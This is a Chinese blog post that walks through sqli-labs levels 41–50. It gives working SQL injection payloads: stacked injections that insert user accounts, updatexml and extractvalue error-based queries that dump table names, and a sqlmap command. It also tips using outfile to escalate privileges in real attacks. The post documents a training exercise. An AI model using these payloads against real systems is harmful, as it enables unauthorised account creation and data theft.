在sqli-liabs学习SQL注入之旅(第四十一关~第五十关)

已于 2022-05-06 16:33:36 修改
阅读量463 收藏 1
点赞数 1
分类专栏: 渗透测试 文章标签: 学习
于 2022-05-05 22:18:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/guanjian_ci/article/details/124599029
版权

四十一关

(考察点:数字型、堆叠注入)

直接往数据库中插入一个 guanjian 账户:
?id=-1;insert into users(id,username,password) values(15,'guanjian','guanjian') --+

可以看见页面虽然报错,但是数据已经成功插入数据库中了。

四十二关

(考察点:POST字符型、堆叠注入)

分析这一关源码我们知道注入点在 password 中:

$username = mysqli_real_escape_string($con1, $_POST["login_user"]);  
$password = $_POST["login_password"]; 

我们直接输入账户:a          随意账户

                      密码:a';insert into users(id,username,password) values(16,'Less42','Less42') #

页面虽然报错,但是查看mysql数据库。我们的账号Less42已经插入成功!!!

四十三关

(考察点:POST字符型(单引号+括号)、堆叠注入)

这里我们不看源码简单判断下:

账户:a'          密码:a        页面跳转到禁止黑客入侵页面

账户:a           密码:a'       页面跳转并且报了错,可以推出注入点在password中

根据报错可以猜测password参数的接受方式为 id = ('&id')

使用堆叠注入插入账户Less43:

账户:a

密码:a');insert into users(id,username,password) values(17,'Less43','Less43') #

页面虽然报错,但是查看mysql数据库。我们的账号Less43已经插入成功!!!

四十四关

(考察点:POST字符型(单引号)、堆叠注入、盲注)

这一关和四十三关类似,区别在于这一关没有报错信息,属于盲注。

直接插入数据:a';insert into users(id,username,password) values(18,'Less44','Less44') #

页面虽然报错,但是查看mysql数据库。我们的账号Less44已经插入成功!!!

四十五关

(考察点:POST字符型(单引号+括号)、堆叠注入、盲注)

这一关和四十四关基本相同,区别在于参数的接受方式不同!

直接插入数据:a');insert into users(id,username,password) values(19,'Less45','Less45') #

页面虽然报错,但是查看mysql数据库。我们的账号Less45已经插入成功!!!

使用账号:Less45        密码:Less45        登录成功!

 四十六关

 又是新的一关,和往常一样输入参数 ?id=1 。卧槽!怎么行不通了:

对报错信息翻译一下,我们能获取到这一关的信息有:参数从id改为sort了;和排序有关;

我们来看一下这一关源码:

改个参数提交,页面正常!开始测试注入:

当sort=1时,页面以id排序:

当sort=2时,页面以password首字母排序:

结果很明显了,sort和排序有关。摸索一段时间过后,发现联合注入行不通:

这一关可以使用报错注入:

爆个数据库名:?sort=1 and updatexml(1,concat(0x7e,(select database()),0x7e),1)

爆个表试试:?sort=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)

  四十七关

这一关和四十六关类似,区别在于这一关是单引号接受参数。直接使用上一关的代码修改:

 ?sort=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)--+

四十八关

这一关通过简单的测试发现,页面是没有回显内容的。只能使用延时注入了。

而且这一关延时注入和之前的管卡一样,只不过换了个参数。我们可以手工判断,但是我选择sqlmap一把梭!嘻嘻嘻

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-48/index.php?sort=1 --dbs

四十九关

 这一关和四十八关一样,只是参数的接受方式不同,这一关为单引号,一样可以使用sqlmap梭哈!不再重复。

注意:这关也可以outfile进行写,实战中优先写入文件直接提权。

五十关

这关可以使用报错注入、堆叠注入。

 堆叠注入:?sort=1;insert into users(username,password) values('Less50', 'Less50') --+

报错注入:?sort=1 and extractvalue(1,concat('~',database()))

 总结:

从这十关学到了

(1)不同参数接受方式的堆叠注入;

(2)有无回显的堆叠注入,页面虽然报错,但是不影响我们成功插入数据;

(3)报错注入&工具sqlmap(永远滴神);

关键_词
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入——sqli-labs第二十四_sqli第二十四
m0_60721695的博客
04-08 380
我们在修改密码界面正常填写我们注册的用户名 admin’# 修改密码为12345 然后我们通过断点调试查看一下 参数已经传进去了 效果如下为了方便理解我直接把admin’#输入到username方便看效果如图后面的语句就被我们注释掉了,这个时候我们改的密码就变成了管理员的密码。所以这个时候我们直接用admin作为用户名 用我们改的密码直接登录就可以直接进入管理员账户。
SQL注入sqli第四(less-4)
s_xcx_ah的博客
06-10 1391
SQLI第四
SQL注入学习part05:(结合sqli-libs学习:41-50
Q_U_A_R_T_E_R的博客
08-05 214
写在前面: 此博客仅用于记录个人学习进度,学识浅薄,若有错误观点欢迎评论区指出。欢迎各位前来交流。(部分材料来源网络,若有侵权,立即删除) SQL注入学习part05第四十一第四十二第四十三第四十四第四十五第四十六第四十七第四十八第四十九第五十 第四十一 尝试发现是数字型的 使用语句;insert into users (id,username,password) values ('41','hacked','hacked'); --+ 验证 注入成功 get it 第四十二
sqli-labs笔记(Stacked Injections)
末初的CSDN博客
05-12 459
sqli-labs项目地址:https://github.com/Audi-1/sqli-labs 文章目录Less-38Less-39Less-40Less-41Less-42Less-43Less-44Less-45Less-46Less-47Less-48Less-49Less-50Less-51Less-52Less-53 正文(堆叠注入) Less-38 使用了一系列执行mysql多条语句查询的函数,导致存在堆叠注入,但是因为源码中一般只返回预期结果,所以堆叠注入的结果回显或者报错就无法.
[SQL注入][Stacked injection]sqli-labs学习记录(38-53)
Y4tacker的博客
08-11 6063
学习记录前置知识堆叠注入第38 ------ 简单堆叠注入第39 ------ 数字型+堆叠注入第40 ------ 闭合`')`+堆叠注入第41 ------ 盲注+堆叠注入第42 ------ POST型+堆叠注入第43 ------ 类似42(堆叠注入)第44 ------ 前置知识 堆叠注入 本来想写的,但是网上一堆堆就不班门弄斧了,看师傅们的吧 堆叠注入详解 第38 ------ 简单堆叠注入 经过简单的测试我们推测sql语句为: SELECT * FROM users WHER
Sqli-labs 堆叠注入篇 (Less38~53)
angry_program的博客
02-15 1592
前言 本blog作为练习笔记, 文笔不才, 仅供参考, 不正之处望大神指正。 堆叠注入篇对应labs的38~53: Less-38 字符型堆叠注入 虽然用很常规的方法都可以注入成功,但是并不侧重于注入爆数据; 而是考察堆叠注入: http://localhost:2333/Less-38/index.php ?id=0' union select 1...
(手工)【sqli-labs50-53】order by注入
07-16 720
SQL-order by注入】
PHP、Apache环境中部署sqli-labsSQL注入靶场)
01-08
sqli-labs 提供了一个实践 SQL 注入的平台,用户可以在这个平台上进行 SQL 注入的练习和测试。 知识点 2: PHP 和 Apache 环境安装 要部署 sqli-labs,需要先安装 PHP 和 Apache 环境。安装过程中可能会遇到各种...
sqli-labs-master.zip sql注入学习靶机
01-18
sql注入学习靶机,由于github经常挂,这里特提供大家下载。
信安必备靶场-sqli-labs-master-用于练习sql注入各种注入类型
08-12
sqli-labs-master是一个SQL注入SQL Injection,简称Sqli)实战靶场的资源。这个靶场通常用于安全培训、渗透测试和学习Web应用程序安全方面的人员,它提供了一系列的模拟环境和挑战,目的是让用户通过实际操作来...
sqli-lib64笔记学习资料.zip
08-22
sqli-lib64是一个专门设计的在线平台,用于帮助开发者和安全爱好者学习和实践SQL注入技术。这个卡挑战提供了65个不同难度的级别,逐步引导用户了解和掌握SQL注入的各种类型和防御策略。 《sqli-labs-1-65閫氬叧鏁...
sqli-labs第七sql注入流程
qq_33598708的博客
04-09 3613
正常访问 http://127.0.0.1/sqli-labs-master/Less-7/?id=1 正常访问以后提示Use outfile..... 什么是outfile:参考地址 MySQL中你可以使用SELECT...INTO OUTFILE语句来简单的导出数据到文本文件上。 判断注入类型 http://127.0.0.1/sqli-labs-master/Less-7/?id=1' and '1'='1 通过注入字符没有报错可以判断是字符类型的,这数据库报错不会提示
sqli-liabs学习SQL注入之旅(第二十一~第三十
guanjian_ci的博客
04-23 3077
二十一 打开这一,开屏暴击。报错的大致意思是时区没有设置好,我们进入报错的文件,在php代码中加入中国时区的代码即可: date_default_timezone_set("PRC"); 其实不改这个也不影响我们做题目,只是有错不改看着难受而已,页面正常后,开始正题: 第一步:在账号密码框一顿输出后,发现注入点不在外面,只能登录进入里面看看,看到了页面显示了我们的UA、cookie等信息。有点类似第二十,属于cookie注入!唯一不同的是这一考察了一个加解密运用,cook.
sqli-labs (less-50)
kukudeshuo的博客
03-15 352
sqli-labs (less-50) 进入50,输入sort=1 http://127.0.0.1/sql1/Less-50/?sort=1' 根据错误信息判断为数字型注入,这里发现这不跟前面有一一模一样,但是我们通过源代码可知,在本中使用了mysgli multi guery()函数,而在less46-49中使用了mysqL fetch_assoc()函数,所以这里的不同点就在于本可以使用堆叠注入的形式 报错注入攻击和时间盲注的攻击在这里我就不详细介绍了,具体过程请看我的less-46,
Sqli-labs全通教程(手工注入+工具使用sqlmap)
热门推荐
qq_57223070的博客
02-24 1万+
希望能帮到你,sqlmap使用及SQL注入手工
sqli-labs (less-44)
kukudeshuo的博客
03-15 360
sqli-labs (less-44) 进入44,发现依然是这个页面 输入admin' 这里发现没有错误回显了,所以我们只能去猜了 admin--+ # admin'--+ 所以判断闭合方式为’#,并且为字符型注入 这里我们直接使用堆叠注入 创建一张表 a';create table test like users;# 创建一个新的用户 a';insert into users values(18,'icepeak','icepeak');# ...
sqli-liabs之旅
weixin_42123571的博客
03-17 694
sqli-liabs之旅 第十一 post型 在username输入'报错 输入'#页面正常 判断闭合为' ’ order by 3#页面错误 ’ order by 2#页面正常 ’ union select 1,2#判断显示位 查库 ' union select database(),2# 查表 ' union select group_concat(table_name),2 fr...
iomuxc、pinctrl子系统、gpio子系统(学习总结)
weixin_61385844的博客
09-04 935
IOMUXC是SOC设计中实现引脚复用的键组件,它通过动态切换引脚功能,提高了IO资源的利用率,满足了不同外设和功能的IO需求。在配置和使用IOMUXC时,需要参考芯片使用手册和设备树文档,确保引脚功能的正确设置。
Android Fragment 学习备忘
最新发布
sdaujz的博客
09-08 154
1.fragment的动态添加与管理:
SQL注入学习之路:sqli-labs靶场实战解析
"sqli-labs靶场练习笔记涵盖了从2到24SQL注入学习内容,适合初学者参考,涉及单引号、双引号注入,布尔盲注,数据库名、表名、列名的探测,以及利用注入进行文件写入和信息获取等技能。" 在SQL注入学习过程...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值